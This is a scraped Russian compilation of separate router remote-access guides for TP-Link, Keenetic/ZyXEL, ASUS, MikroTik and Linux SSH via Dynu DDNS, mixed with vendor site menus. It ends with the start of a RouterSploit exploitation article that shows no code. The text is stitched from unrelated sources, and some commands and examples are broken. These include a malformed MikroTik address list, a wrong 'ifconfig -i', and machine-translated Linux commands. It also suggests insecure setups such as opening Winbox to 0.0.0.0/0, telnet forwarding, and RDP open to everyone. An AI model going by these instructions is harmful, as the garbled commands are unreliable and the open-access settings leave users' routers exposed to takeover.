Как зайти на роутер удаленно: Доступ к MikroTik из интернета: настройка удаленного управления

Содержание

Удаленный доступ из Интернета на компьютер домашней сети, подключенный через Keenetic (для версий NDMS 2.11 и более ранних) – Keenetic

RUS
  • RUS
  • ENG
  • TUR
  • UKR
  • Модели
  • Почему Keenetic
  • Поддержка
  • Отправить запрос
  • Войти
  • Отправить запрос
  • Войти
  • Модели
  • Поддержка
  • Где купит

Как удаленно подключиться к роутеру через интернет

Подготовительные действия

Сперва потребуется выполнить авторизацию в веб-интерфейсе маршрутизатора, используя для этого подключенный к нему компьютер или ноутбук. Все следующие инструкции будут разобраны на примере TP-Link, поэтому и о принципе входа в интернет-центр рекомендуем прочитать в другой статье на нашем сайте, где за основу взята соответствующая модель роутера.

Подробнее: Вход в веб-интерфейс роутеров TP-Link


Второй этап подготовительных действий — определение метода получения IP-адреса, а также его сравнение на специальном сайте. Это необходимо сделать для того, чтобы выбрать дальнейший способ настройки удаленного подключения и вообще понять, можно ли это реализовать при текущих параметрах. Просмотр нужной информации осуществляется во всех веб-интерфейсах роутеров одинаково. Откройте раздел «Состояние» или «Мониторинг», где отыщите раздел «WAN» и обратите внимание на строку «IP-адрес». Здесь же вы можете узнать, статический он или динамический.

Теперь понадобится определить, белый ли IP-адрес, то есть в интернете он должен быть таким же, как и отображается в веб-интерфейсе. Для этого проще всего использовать специальный сайт для определения IP-адреса, перейти к которому можно по ссылке ниже. Если адрес соответствует определенному через интернет-центр, значит, он белый.

Перейти к сайту 2ip для определения IP-адреса роутера

Отталкиваясь от полученной информации, можно понять, чем стоит заняться в дальнейшем, какой метод организации удаленного доступа выбрать и реально ли его вообще настроить. Существует три варианта развития событий:

  • Серый IP. Если при сравнении IP-адресов оказалось, что в веб-интерфейсе написано одно значение, а сайт видит совершенно другое, при этом VPN на компьютере не включена, значит, провайдер предоставляет серый IP. Использовать его для удаленного подключения не получится — остается только обратиться напрямую к поставщику интернет-услуг и заказать у него переподключение на статический IP-адрес, если компания предоставляет такую услугу.
  • Белый статический IP. Если в ходе проверки оказалось, что адрес статический, это означает, что следует выбрать первый метод настройки удаленного подключения, используя для этого функцию «Удаленное управление» в веб-интерфейсе маршрутизатора.
  • Белый динамический IP. Динамический IP-адрес время от времени меняется, поэтому настройки, заданные в веб-обозревателе, могут в любой момент сбиться, из-за чего пропадет удаленный доступ. Конечно, ничего не мешает воспользоваться первым методом, чтобы временно предоставить возможность подключение, но проще будет задействовать услугу «Динамический DNS», о чем пойдет речь во втором способе.

Внимательно ознакомьтесь с представленной информацией, чтобы подобрать подходящий вариант, а затем переходите к его реализации, следуя инструкциям ниже.

Способ 1: Функция «Удаленное управление»

Практически во всех прошивках любого маршрутизатора есть функция «Удаленное управление», которая по умолчанию отключена. Она открыта для настройки и позволяет наладить доступ всем целям или только конкретному компьютеру для удаленного управления, а выполняется такое конфигурирование следующим образом:

  1. После авторизации в интернет-центре откройте раздел
    «Защита»
    и отыщите там «Удаленное управление». Расположение меню может отличаться в зависимости от типа веб-интерфейса. Иногда, например, требуется открыть меню «Система» и там уже отыскать требуемый пункт.
  2. Если вы хотите сделать, чтобы любой компьютер мог подключиться к роутеру, введите IP-адрес 255.255.255.255. При предоставлении доступа только конкретной цели укажите в строке ее IP-адрес. Однако при этом учитывайте, что он должен быть статическим, ведь при изменении произойдет сброс параметров. По завершении не забудьте сохранить изменения. Снова поменяйте значение на 0.0.0.0 в том случае, когда удаленный доступ нужно будет прекратить.
  3. Открывая доступ ко всем устройствам, стоит позаботиться о защите веб-интерфейса во избежание взлома роутера. Для этого откройте раздел «Системные инструменты» и перейдите в «Пароль».
  4. Советуем поменять не только пароль, но и имя пользователя для входа в интернет-центр. Если не уверены в том, что запомните данные, запишите их или сохраните в текстовом файле, ведь восстановить стандартные значения можно будет только полным сбросом настроек маршрутизатора.
  5. Теперь при вводе в браузере на удаленном компьютере IP-адреса роутера будет произведен переход к веб-интерфейсу с доступом к управлению настройками.

Дополнительно отметим, что при выборе конкретной цели для предоставления удаленного управления потребуется указать ее точный IP-адрес. Для его определения можно воспользоваться веб-интерфейсом маршрутизатора так, как это было показано выше, или инструкцией в других статьях на нашем сайте.

Подробнее:
Как узнать IP-адрес своего компьютера
Как узнать IP-адрес чужого компьютера

Способ 2: Подключение динамического DNS

Функция динамического DNS часто распространяется платно, но сейчас появляется все больше сервисов, предоставляющих пробные периоды, а также бесплатные версии. Суть такого DNS заключается в присвоении роутеру буквенного адреса, который заменяет стандартный IP. Подойдет это в тех ситуациях, когда организация удаленного доступа невозможна из-за постоянной смены адреса роутера. Выполняется подключение динамического DNS в четыре простых шага.

Шаг 1: Выбор сервиса

Начать следует именно с выбора сервиса, чтобы подыскать бесплатный или дешевый вариант. Часто в веб-интерфейс маршрутизатора уже встраивается несколько совместимых вариантов, поэтому лучше будет задействовать их, но ничего не помешает найти в интернете и сайт, предоставляющий такие услуги.

  1. В интернет-центре откройте раздел «Динамический DNS».
  2. Разверните список «Поставщик услуг», выберите там один из сервисов, а затем нажмите «Перейти к регистрации» для проверки каждого сайта.

Просмотрите описание и цены на каждом сайте, чтобы найти подходящий тарифный план. В TP-Link и некоторых других маршрутизаторах доступен noip. Это оптимальное решение для тех, кто хочет бесплатно проверить технологию. На примере этого сервиса и будет разобран следующий шаг.

Шаг 2: Регистрация динамического DNS

Интерфейс сайтов различается, поэтому нельзя создать универсальное руководство, позволяющее разобраться с каждым из них. Однако практически везде принцип взаимодействия одинаков, поэтому остановимся на noip, а вам останется лишь взять следующие действия за пример.

  1. После перехода на главную страницу сайта создайте свой домен, написав его адрес латиницей. Учтите, что сам адрес должен быть уникальным.
  2. Создайте новый аккаунт на сайте, введя почту и пароль.
  3. Оплатите подписку, если был выбран платный тарифный план, затем подтвердите правила использования сервиса и зарегистрируйтесь.
  4. В обязательном порядке подтвердите электронную почту, перейдя по ссылке, которая была получена в письме.
  5. Вы будете уведомлены об успешной регистрации динамического DNS. Если в инструкции на сайте есть дополнительные пункты про проброс портов и скачивание приложения, пока это можно обойти стороной, а вернуться к настройке только в том случае, если подключение выполнить не удастся.
  6. После перехода к личному профилю на сайте доменное имя должно отображаться в списке, из чего следует то, что оно работает.

Шаг 3: Настройка DDNS в веб-интерфейсе

Перед соединением остается только настроить динамический DNS через интернет-центр маршрутизатора. Для этого перейдите в то же самое меню, выберите поставщика услуг, вставьте полученное доменное имя, введите логин и пароль, используемые на сайте. Активируйте пункт «Включить DDNS» и выполните вход.

Убедитесь, что состояние подключения находится в статусе «Успешно». Только после этого можно переходить к проверке удаленного управления.

Если выполнить вход не удалось, проверьте правильность ввода личных данных от аккаунта на сайте или подождите несколько минут для обновления информации по доменам, а после повторите авторизацию. Дополнительно всегда можно обратиться в поддержку на сервисе, чтобы получить профессиональную помощь.

Шаг 4: Получение удаленного доступа

Распространите динамический DNS-адрес между всеми пользователями, кому хотите предоставить удаленное управление роутером. Они должны будут ввести его в адресной строке браузера и перейти. Для авторизации в веб-интерфейсе потребуется указать логин и пароль, а об изменении учетных данных мы говорили при разборе Способа 1.

Уточним, что в этой статье мы не разобрали опцию «Облако TP-Link», поскольку ее поддерживает всего несколько дорогостоящих моделей роутеров от данного производителя, а другие компании пока не практикуют добавление подобных функций. Если же вы являетесь обладателем устройства, в котором есть такой инструмент, перейдите к нему через веб-интерфейс и ознакомьтесь с детальными инструкциями от разработчиков, чтобы разобраться в подключении.

Мы рады, что смогли помочь Вам в решении проблемы.
Опишите, что у вас не получилось. Наши специалисты постараются ответить максимально быстро.
Помогла ли вам эта статья?
ДА НЕТ

Как Подключиться к Роутеру TP-Link Удаленно Через Облачный Доступ?

Облачная функция TP-Link ID появилась в новых моделях устройств этой фирмы для удаленного подключения и доступа к роутеру через интернет с компьютера или телефона. Это бывает необходимо для экстренного изменения каких-либо настроек или перезагрузки роутера. У новичков возникает справедливый вопрос, что такое ТП-Линк ИД и где его взять? Сегодня покажу, как в зарегистрироваться в этом облачном сервисе, получить доступ к роутеру и пользоваться TP-Link ID удаленно через компьютерный браузер или мобильное приложение для смартфона.

Что такое TP-Link ID?

TP-Link ID — это учетная запись пользователя в облачном сервисе роутера ТП Линк.

Мы уже сталкивались с облачными сервисами на маршрутизаторах других производителей, которые успели внедрить ее немного раньше, чем ТП-Линк. Суть ее состоит в том, чтобы иметь доступ к настройкам роутера не только будучи напрямую подключенным к его wifi сигналу, но и удаленно, через интернет. Таким образом появляется возможность управлять домашней или рабочей сетью, находясь далеко за пределами помещения в любой точке земного шара. Удобно, не правда ли?

На каких моделях работает удаленный доступ по TP-Link ID?

Функция облачного доступа к роутеру через TP-Link ID работает только на дорогих моделях и среднего ценового сегмента. Например, на серии Archer — C1200, C2. Самые бюджетные, типа TL-WR820N, ее не поддерживают. Также, как и популярные TL-WR842ND, TL-WR840N, TL-WR841N, WR740N и WR741ND в своих первых модификациях (ревизиях). В любом случае, будет ли возможность подключения к сети через облако конкретно на вашем маршрутизаторе, нужно смотреть в технических характеристиках.

Удаленное управление роутером через облако TP-Link ID с компьютера

Для того, чтобы получить удаленное управление роутером TP-Link с доступом через интернет, необходимо сначала зарегистрироваться в TP-Link ID. Для этого нужно прежде всего авторизоваться в роутере под учетной записью администратора. Сделать это можно как с компьютера через браузер по IP адресу роутера, так и со смартфона через программу TP-Link Tether. В конце статьи я покажу, где именно в нем находится эта настройка, а пока начнет с ПК.

Открываем вкладку «Базовая настройка» и заходим в раздел «Облако TP-Link»

И жмем на кнопку «Зарегистрируйтесь сейчас»

Для создания аккаунта необходимо указать свою электронную почту, задать пароль и согласиться с правилами сервиса.

После этого на email будет отправлено письмо с данными для завершения регистрации в TP-Link ID.

Подтверждаем ее и авторизуемся. На странице отобразится информация о вашем аккаунте, а текущий маршрутизатор привяжется к нему — теперь можно управлять wifi удаленно.

Еще один момент — поскольку теперь роутер привязан к данному аккаунту, для того, чтобы попасть в его личный кабинет нужно будет вводит не пароль локального администратора, как было раньше, а авторизовываться именно в облачном сервисе TP-Link ID

Удаленный доступ к маршрутизатору через TP-Link ID с телефона

Для привязки удаленного доступа к маршрутизатору со смартфона через мобильное приложение TP-Link Tether, необходимо открыть меню «Инструменты» и зайти в одноименную рубрику «TP-Link ID»

Далее либо входим в уже существующий аккаунт, либо заводим новый

Для регистрации указываем так же email, задаем пароль и соглашаемся с правилами

И привязываем свой роутер к новому аккаунту

После чего он будет отображаться в качестве владельца устройства.

Но также есть возможность добавить дополнительно администраторов сети, который сможет аналогично входить в настройки удаленно.

Видео по регистрации TP-Link ID и добавлению устройства

Спасибо!Не помогло

Цены в интернете

Александр

Специалист по беспроводным сетям, компьютерной технике и системам видеонаблюдения. Выпускник образовательного центра при МГТУ им. Баумана в Москве. Автор видеокурса «Все секреты Wi-Fi»

Задать вопрос

Как настроить локальный и удаленный доступ к управлению на Archer C50/C20 (новый интерфейс)?

Локальное управление

1. Войдите в интерфейс управления маршрутизатором. Если вы не знаете, как это сделать, обратитесь к инструкции Как войти в веб-интерфейс Wi-Fi роутера (новый логотип)?

2. Перейдите в раздел Защита > Локальное управление, здесь вы можете заблокировать доступ к маршрутизатору для компьютеров в локальной сети.

Например, если вы хотите разрешить компьютерам с определенными MAC-адресами получать доступ к веб-странице управления маршрутизатором внутри сети, выполните следующие действия:

1) Выберите Только указанным компьютерам разрешен доступ к веб-утилите настройки с правами администратора.

2) Введите MAC-адрес каждого ПК отдельно. Формат MAC-адреса — XX-XX-XX-XX-XX-XX (X — любая шестнадцатеричная цифра). Только ПК с указанными MAC-адресами могут использовать пароль для просмотра веб-страниц настроек роутера и выполнения его настроек.

3) Нажмите Добавить, и MAC-адрес вашего ПК также будет указан.

4) Нажмите Сохранить.

Совет: Если ваш ПК заблокирован, но вы хотите снова получить доступ к маршрутизатору, нажмите и удерживайте кнопку «Сброс», чтобы сбросить маршрутизатор на заводские настройки по умолчанию.

Удаленное управление

1. Войдите в интерфейс управления маршрутизатором. Если вы не знаете, как это сделать, обратитесь к инструкции Как войти в веб-интерфейс Wi-Fi роутера (новый логотип)?

2. Перейдите в раздел Защита > Удаленное управление, при помощи этой настройки вы можете управлять своим маршрутизатором с удаленного устройства через Интернет.

Порт управления веб-интерфейсом — Доступ к веб-браузеру обычно использует стандартный порт HTTP-службы 80. Этот номер порта удаленного управления по умолчанию для маршрутизатора — 80. Для более высокой безопасности вы можете изменить веб-порт удаленного управления на пользовательский порт, введя число от 1 до 65534, но не использовать номер какого-либо общего служебного порта.

IP-адрес удаленного управления — это адрес, который вы будете использовать при доступе к маршрутизатору через удаленное устройство. Эта функция отключается, если для IP-адреса установлено значение по умолчанию 0.0.0.0. Чтобы включить эту функцию, измените 0.0.0.0 на действительный IP-адрес. Если он установлен в 255.255.255.255, все удаленные устройства могут получить доступ к маршрутизатору из Интернета.

Советы:

• Чтобы получить доступ к маршрутизатору, введите IP-адрес вашего маршрутизатора WAN в адресной строке браузера, а затем двоеточие и номер порта, который вы настроии. Например, если WAN-адрес вашего маршрутизатора — 202.96.12.8, а номер порта — 8080, введите в свой браузер http://202.96.12.8:8080. Позже вас могут попросить ввести пароль маршрутизатора. После успешного ввода имени пользователя и пароля вы сможете получить доступ к веб-странице управления маршрутизатором.

 • Обязательно измените пароль маршрутизатора по умолчанию для целей безопасности.

Чтобы получить подробную информацию о каждой функции и настройке оборудования, перейдите на страницу Загрузки для загрузки руководства пользователя к вашей модели устройства.

Удаленный доступ к роутеру: настройка, подключение

Хоть и не так часто, но требуется удаленный доступ к роутеру извне. Например, с другой подсети, или вообще из Интернета. Посмотреть статистику, что то поднастроить, запретить или наоборот открыть доступ, при это находясь в другом городе.

Или же попасть вовнутрь сети, управляемой нашим роутером, с работы. Все эти вопросы и способы осуществления рассмотрим в данной статье на примере разных моделей маршрутизаторов.

В первой части статьи мы рассмотрим настройки, чтобы иметь возможность удаленно подключиться непосредственно к маршрутизатору, во второй части статьи – как зайти в созданную им локальную сеть извне.

Настройка маршрутизатора

Логично предположить, что потребуется настройка роутера. Для входа в меню настроек используется веб браузер, и IP адрес роутера, указанный под днищем роутера, или в инструкции по настройке. В качестве примера настройки возьмем роутер ZyXEL.

Этикетка под днищем

Заходим в настройки. Далее настройки зависят от того, разрешим ли мы подключение к маршрутизатору с любого внешнего IP-адреса, или с конкретного адреса. Например, ZyXEL установлен дома, и нам необходим доступ к настройкам с работы. Адрес рабочего компьютера статичный, то есть постоянный, и в таком случае нам лучше выбрать второй вариант. Если же мы не знаем, когда и откуда потребуется подключение, то выбираем первый вариант.

Настройка подключения с любого IP-адреса

В настройках маршрутизатора заходим в меню «Безопасность», и переходим в подменю «Трансляция сетевых адресов (NAT)».

Создание правила трансляции адресов

Доступ к веб интерфейсу роутера будет осуществляться по http протоколу (можно настроить и на telnet, но это устаревшая технология), использоваться будет стандартный для http порт 80.

Итак, создаем правило доступа:

  1. Интерфейс – выбираем пункт, по которому у нас используется подключение к провайдеру (PPPoE, L2TP, PPTP). Как пример выберем ISP. Конкретно для вашего случая тип подключения указан в договоре с провайдером;
  2. Протокол – TCP/80;
  3. Перенаправить на адрес – тут указываем IP-адрес нашего роутера. По заводским настройкам он 192.168.1.1, если он изменен – указываем его;
  4. Новый номер порта назначения – пишем 80.

Жмем «Сохранить» и перезагружаем роутер.

Теперь, чтобы к нему подключиться извне, заходим на сайт 2IP и записываем «белый» IP адрес роутера.

Настройка подключения конкретного IP адреса

Теперь разберемся с компьютером, установленным на работе. Находясь на работе, командой «ipconfig» узнаем его IP адрес, и записываем на бумажку.

Далее, придя домой, заходим в настройки кинетика, и переходим в меню «Безопасность», далее подменю «Межсетевой экран».

Создание правил для одного IP адреса

В поле «Действие» выбираем значение «Разрешить». В поле «IP-адрес источника» выбираем значение «один» и пишем сетевой адрес рабочего компьютера, записанного на листочке. В поле «Протокол» также выбираем «TCP/80».

Жмем «Сохранить», перезагружаем маршрутизатор.

Подключение через Telnet

На всякий случай рассмотрим и настройку через Telnet.

Снова переходим в настройку трансляции адресов (как в первом примере), и в поле «Протокол» выбираем пункт «TCP/23 – удаленный терминал (telnet)».

Настройка подключения через Telnet

Соответственно порт указываем уже не 80, а 23. Также сохраняем настройки и перезагружаемся.

Доступ к другой модели роутера

Кратко рассмотрим другую модель роутера – ASUS 520gc.

Заходим в настройки, выбираем пункт «Internet Firewall», подпункт «Basic Config».

Включение разрешения доступа с внешней сети

По умолчанию доступ отключен – включаем его в строке «Enable Web Access from WAN». Жмем «Apply». Далее нам нужно узнать IP адреса, которые назначил роутер для подключения к нему извне. Переходим в пункт «Status and Log», далее подменю «System Log».

Логи роутера

Смотрим внимательно логи, и ищем строки, указанные на скриншоте. Для доступа к настройкам роутер из внутренней сети используем адрес LAN, для доступа из Интернета – WAN.

Доступ к компьютеру через маршрутизатор

Теперь ознакомимся, как подключиться к компьютеру, который подключен к Интернет через наш роутер. В качестве примера снова возьмем ZyXEL Keenetic.

Сначала скачиваем и устанавливаем на компьютер специальную программу удаленного доступа «Remote Desktop». В некоторых версиях Windows данная программа уже входит в дистрибутив.

Переходим в настройки роутера, пункт «Домашняя сеть», подпункт «Серверы».

Настройка перенаправления портов

Ставим галочку «Перенаправление портов». В поле «Сервис» выбираем «другой», далее заходим в настройки программы Remote Desktop, и смотрим номер порта, который она использует в качестве удаленного доступа. В нашем примере это 3389. Пишем его в настройках роутера в поле «Порты».

Далее в поле «IP-адрес сервера» выбираем вариант «Введенный», и в следующем поле пишем IP-адрес компьютера, на котором установлена программа. В нашем случае 192.168.1.33. В «Описании» пишем название правила (чтобы не запутаться, если их будем много), и в «В доступ из Интернета» указываем, кому разрешено удаленно подключаться. Для примера разрешим всем.

Жмем кнопку «Добавить».

Настройка IP адреса компьютера

Вы обратили внимание, что мы указали фиксированный IP адрес компьютера, к которому открыли доступ извне. Это значит, что у данного компьютера и должен быть постоянный адрес, а не динамический IP, который при каждом включении может изменяться. Фиксировать сетевой адрес мы будем по физическому MAC-адресу компьютера.

Для решения в настройках роутера необходимо выделить постоянный адрес данному компьютеру. Переходим в настройки маршрутизатора, выбираем меню «Домашняя сеть», далее подменю «Организация сети».

Фиксирование IP-адреса компьютера

В нижней части открывшегося окна «Арендованные адреса» в поле «MAC-адреса» выбираем значение «Введенный». В следующем поле вводим MAC-адрес компьютера, на котором установлена программа, в третьем поле пишем IP-адрес (для нашего примера – 192.168.1.33.). Задаем имя правилу.

Жмем «Фиксировать».

Теперь, даже если включен DHCP сервер, то все равно для данного компьютера IP-адрес меняться не будет никогда, пока не отменим правило.

Настройка и работа программы Remote Desktop

Настраиваем удаленный доступ на роутере Mikrotik

Бывают случаи, что нужно настроить на роутере Mikrotik удаленный доступ, для этого необходимо иметь так называемый белый IP адрес, или, как его еще называют – статический. А так же, у вас должен быть уже настроен сам роутер Mikrotik, о том как его настраивать, читайте в этой статье, где подробно описан процесс настройки PPPoE соединения на Mikrotik. И так, предположим, что у вас имеется статический IP адрес, который выдал вам ваш интернет-провайдер, и вы скачали с официального сайта утилиту для роутеров Mikrotik под названием Winbox. Если же нет, переходите по этой ссылке на официальный сайт и скачиваете ее, после чего можно продолжать настройку удаленного доступа через утилиту Winbox.

Настройка удаленного доступа к Mikrotik

В данной статье мы рассмотрим два простых способа, как можно настроить удаленный доступ к Mikrotik, и начнем с утилиты Winbox. Запускаем Winbox, авторизуемся, а затем идем в пункт “IP” и в открывшейся вкладке выбираем “Firewall”:

Откроются настройки Firewall, тут нас интересует вкладка “Filter Rules”, так как в ней отображаются правила для фаервола. В верхнем углу нажимаем на крестик:

Откроется окно, в котором можно задавать правила для Firewall, что мы собственно сейчас и сделаем. В поле “Chain” выставляем “input”, в поле “Protocol” задаем “tcp”, а в поле “Dst. Port” выставим порт по котором работаем Winbox “8291”:

Далее переходим во вкладку “Action” и в поле “Action” выставляем “accept”, затем сохраняем настройки, для этого нажимаем на кнопки “Apply” и “OK”:

Новое правило сохраниться в самом низу, но, перед ним будут стоять другие правила Firewall, которые возможно будут перекрывать наше только что созданное, по этому его необходимо переместить в самый верх. Это делается при помощи мышки, зажимаете правой клавишей наше правило и перемещаете его вверх:

Но, это еще не все, осталось добавить адреса откуда мы разрешим подключаться к Mikrotik. Для этого идем в пункт “IP”, далее в выпадающем списке выбираем пункт “Services”:

В открывшемся окне нас интересует на данный момент Winbox, для него необходимо задать адреса и подсети, с которых и будет происходить подключение:

Двойным нажатием левой клавишей мыши открываем окно, и в строке “Available From” вписываем адрес, затем, если нам нужно добавить еще один адрес, нажимаем на черную стрелку в низ, и у нас появляется еще одна строка, в которую так же вписываем адрес. А в том случае, если необходимо удалить какой-то адрес, эту же черную стрелку нажимаем вверх:

Сохраняем настройки нажатием на кнопки “Apply” и “OK”, можно приступать к проверке, все должно работать. Так же имеется способ задать эти же правила через терминал Mikrotik. Что бы задать правила через терминал, нажимаем на вкладку “New Terminal”:

И в открывшемся терминале вводим команды:

/ip firewall filter add chain=input protocol=tcp dst-port=8291 disabled=no action=accept place-before 0

Первой командой мы разрешаем входящий трафик на порт 8291, и поднимем его в самый верх в списке правил Firewall. Затем, необходимо задать правило на адреса подключений, в примере приведу правило на подключение со всех адресов. Но, в целях безопасности, настоятельно рекомендую вам исправить строку “0.0.0.0/0” и задать вместо нее только доверенные адреса.

/ip service set winbox address=0.0.0.0/0

К примеру, если задавать несколько IP адресов, то есть, примерно вот так:

192.168.1.0/168.66.9.10/198.56.88.105/24

P.S. первый IP адрес указан локальной сети, если его не указать, то вы из локальной сети не сможете подключаться к Mikrotik, и тем самым рискуете потерять над ним контроль. А адреса 168.66.9.10 и 198.56.88.105/24 идут для подключения из сети. По этой причине, рекомендую работать в режиме “Safe Mode”, он активируется вверху утилиты Winbox:

Заключение

Не рискуйте и не оставляете настройки подключения для всех IP адресов, так как в этом случае, ваш Mikrotik может превратиться в чей-то Proxy или того хуже, станет частью ботнета. В любом случае лучше перестраховаться и не рисковать вашим Mikrotik, так как были случае, когда ‘угоняли’ роутеры и использовали их как машину для атак.

А на этом сегодня все. Надеюсь данная статья будет вам полезна.
Журнал Cyber-X

Как настроить удаленное управление на роутере DrayTek

Продукты
  • Маршрутизаторы
    • ADSL / VDSL / Fiber (FTTC) маршрутизаторы
    • Маршрутизаторы с балансировкой нагрузки
    • Межсетевые экраны
    • Мобильные широкополосные / 4G / LTE-маршрутизаторы
    • IP АТС
    • Сравнение продуктов
  • Точки доступа
    • Управляемая беспроводная сеть
    • Mesh Wireless
    • Наружные точки доступа
    • Сравнение продуктов
    • Управление AP
  • Переключатели
    • Сетевые коммутаторы
    • Видео переключатели
    • Сравнение продуктов
  • Модемы
  • Аксессуары
    • Фильтрация веб-содержимого
    • Расширенная гарантия VigorCare
    • Антенны
    • USB-термометр
    • Кабель прямого подключения SFP
    • Удлинительный кабель 4G LTE
    • Наружная антенна 4G и LTE
    • Инжектор PoE высокой мощности
    • Комплект для монтажа в стойку
    • VigorConnect
  • Управление
  • Сравнение продуктов
    • Межсетевые экраны / маршрутизаторы
    • Переключатели
    • Точки беспроводного доступа
База знаний
  • Решения
    • Широкополосное аварийное переключение
    • Решения 3G / 4G LTE
    • Балансировки нагрузки
    • Высокая доступность
    • Фильтрация веб-содержимого
    • Качество обслуживания (QoS)
    • Безопасность беспроводной сети WPA3
    • VPN
    • Центральное управление
    • Управляемая беспроводная сеть
    • Mesh Wireless
    • PCI DSS — Безопасность кредитных карт с DrayTek
    • Работа из домашних VPN-решений
  • Особенности
    • Маршрутизаторы
    • Точки доступа
    • Переключатели
    • Модемы
    • Управление
  • Видео
    • Примеры из практики
    • Статьи блога
      • Загрузки
      • Демонстрация веб-интерфейса маршрутизатора
      Служба поддержки
      • Загрузки и ресурсы
      • Контактная поддержка
      Новости
      • Представляем Vigor 2927
      • COVID-19 — Заявление о непрерывности бизнеса
      • Представляем Vigor 3910
      • Больше новостей
      Связаться с нами
      • О DrayTek
      • Стать дилером
      • Связаться с нами
      • Карьера
        • Где купить
        Авторизоваться
        • Продукты
          • Маршрутизаторы
            • Маршрутизаторы ADSL / VDSL / Fiber (FTTC)
            • Маршрутизаторы с балансировкой нагрузки
            • Межсетевые экраны
            • Мобильные широкополосные / 4G / LTE-маршрутизаторы
            • IP-АТС
            • Управляемые точки доступа
            • Wireless
            • Mesh Wireless
            • Наружные точки доступа
            • Сравнение продуктов
            • Управление точками доступа
          • Коммутаторы
            • Сетевые коммутаторы
            • Видеокоммутаторы
            • Сравнение продуктов
          • Модемы
          • или
          • Фильтрация содержимого
                Веб-фильтрация
                  Гарантия
                • Антенны
                • USB-термометр
                • Кабель для прямого подключения SFP
                • Удлинительный кабель 4G LTE
                • Наружная антенна 4G и LTE
                • Инжектор PoE высокой мощности
                • Комплект для монтажа в стойку
                • Устройство для управления VigorConnect
                • ison
                  • Межсетевые экраны / маршрутизаторы
                  • Коммутаторы
                  • Точки беспроводного доступа
                • База знаний

                  Как получить удаленный доступ к машине CentOS / Ubuntu Linux?

                  Шаг 1. Включите SSH на вашем компьютере

                  Linux имеет множество дистрибутивов, и вам нужно будет включить SSH на вашем компьютере для удаленного доступа к нему.Ниже приведены примеры включения SSH в некоторых распространенных дистрибутивах Linux, таких как Ubuntu 16.04 LTS, CentOS 7. По умолчанию SSH работает на 22-м порту.

                  Ubuntu 16
                  Установите сервер OpenSSH: sudo apt-get install openssh-server
                  Проверить статус службы SSH: sudo service ssh status
                  Отредактируйте файл конфигурации SSH: sudo vi / etc / ssh / sshd_config
                  Перезагрузить SSH: sudo service ssh restart

                  RHEL 7 Linux
                  Установите сервер OpenSSH: yum install openssh
                  Проверьте статус службы SSH: systemctl status sshd
                  Запустить SSH: systemctl start sshd
                  Отредактируйте файл конфигурации SSH: sudo vi / etc / ssh / sshd_config
                  Перезагрузите SSH: systemctl перезапустите sshd.сервис


                  Шаг 2. Настройте перенаправление портов (трансляцию портов) в маршрутизаторе

                  Пожалуйста, войдите в интерфейс маршрутизатора (обычно на http://192.168.1.1 или http://192.168.0.1) и перейдите в «Перенаправление портов». раздел. Добавьте новое правило «Переадресация портов» для TCP-порта 22, который будет перенаправлен на внутренний IP-адрес вашей Linux-машины.Машине будет назначен внутренний IP-адрес, даже если вы используете ее как виртуальную машину. Чтобы получить внутренний IP-адрес, вы можете ввести ifconfig -i . Обычно он имеет форму «192.168.0. **».
                  ПРИМЕЧАНИЕ : Если вам нужно подключиться к нескольким машинам Linux за одним и тем же маршрутизатором, вы должны настроить переадресацию портов для все эти машины. Предположим, что у Linux-машины 1 есть внутренний IP-адрес 192.168.0.24, машина 2 имеет внутренний IP 192.168.0.46, а машина 3 имеет внутренний IP 192.168.0.58. Мы можем настроить разные внешние порты для разных машин, как показано на рисунке ниже. Вам также нужно будет изменить порт SSH по умолчанию на машинах Linux, отредактировав файл конфигурации, расположенный по адресу / etc / ssh / sshd_config .
                  Чтобы проверить, правильно ли настроена переадресация портов, вы можете использовать наш Проверка порта сетевой инструмент, чтобы узнать, открыт ли соответствующий порт.Если после проверки порта вы получили ответ «Успешно», значит, ваша сеть настроена правильно.
                  ШАГ 4. Сопоставьте динамический IP-адрес с именем хоста

                  Интернет-провайдеры регулярно меняют ваш IP-адрес, но с помощью динамического DNS вы можете сохранить ваш домен, указывающий на текущий IP-адрес вашего домашнего сервера или других устройств.

                  Вы можете регистр собственное доменное имя (yourdomain.com) и Подписаться для Dynu Dynamic DNS Service или используйте бесплатное доменное имя Dynu (yourdomain.dynu.com). Вы можете сослаться на это Начиная учебник для получения дополнительной информации.

                  ШАГ 5. Используйте службу Dynu DDNS для удаленного доступа к вашей машине

                  Скачать наш клиент обновления IP для Linux и запустите его на своем компьютере, чтобы имя хоста было сопоставлено с вашим динамическим IP. Вы также можете настроить службу DDNS на своем маршрутизаторе, если ваш маршрутизатор поддерживает ее.

                  Теперь у вас должна быть возможность получить доступ к своей машине с помощью yourhostname.dynu.com из-за пределов сети через SSH-клиент, такой как Putty.exe.


                  ПРИМЕЧАНИЕ : В случае подключения нескольких машин для машины 1 вы можете использовать «yourhostname.dynu.com:22», для машины 2, вы можете использовать yourhostname.dynu.com:23, а для машины 3 вы можете использовать yourhostname.dynu.com:24.

                  Как получить контроль над маршрутизатором с помощью RouterSploit «Null Byte :: WonderHowTo

                  Маршрутизатор — это ядро ​​любого Интернет-опыта, но большинство людей не тратят много времени на настройку этого критически важного оборудования.Старая прошивка, пароли по умолчанию и другие проблемы конфигурации продолжают преследовать многие организации. Использование плохого, запущенного компьютера внутри этих маршрутизаторов стало настолько популярным и простым, что были созданы автоматизированные инструменты, которые упростили этот процесс.

                  В этом руководстве мы узнаем, как использовать RouterSploit, инструмент для автоматизации процесса эксплуатации маршрутизатора. Но прежде чем мы начнем прямо сейчас, давайте получим небольшую справочную информацию о доступных инструментах и ​​о том, почему использование маршрутизаторов так широко.

                  Основы эксплуатации маршрутизатора

                  Использование маршрутизатора работает путем нарушения безопасности Wi-Fi маршрутизатора, обхода страницы административного входа и доступа к административным функциям. Затем опытный злоумышленник может нацелить существующую микропрограмму, которая запускает маршрутизатор, с помощью процедуры, называемой «руткиттинг», при которой в маршрутизатор загружается специальная микропрограмма для включения расширенных вредоносных функций.

                  В зависимости от целей и ресурсов злоумышленника это может включать слежку за пользователем и любыми подключенными устройствами, внедрение вредоносного ПО в браузер для использования подключенных устройств, включение расширенных целевых фишинговых атак и маршрутизацию незаконного трафика для преступной деятельности через эксплуатируемые роутеры.

                  Правительственный взлом маршрутизатора с помощью Cherry Blossom

                  Государственные агентства, такие как АНБ и ЦРУ, накапливают эксплойты для маршрутизаторов, и ShadowBrokers пригрозили выпустить эти эксплойты сразу после утечек Windows SMB, которые породили WanaCry (или WannaCry). Если они устранят угрозу утечки эксплойтов маршрутизаторов в июне, такие инструменты, как Cherry Blossom , могут стать мейнстримом.

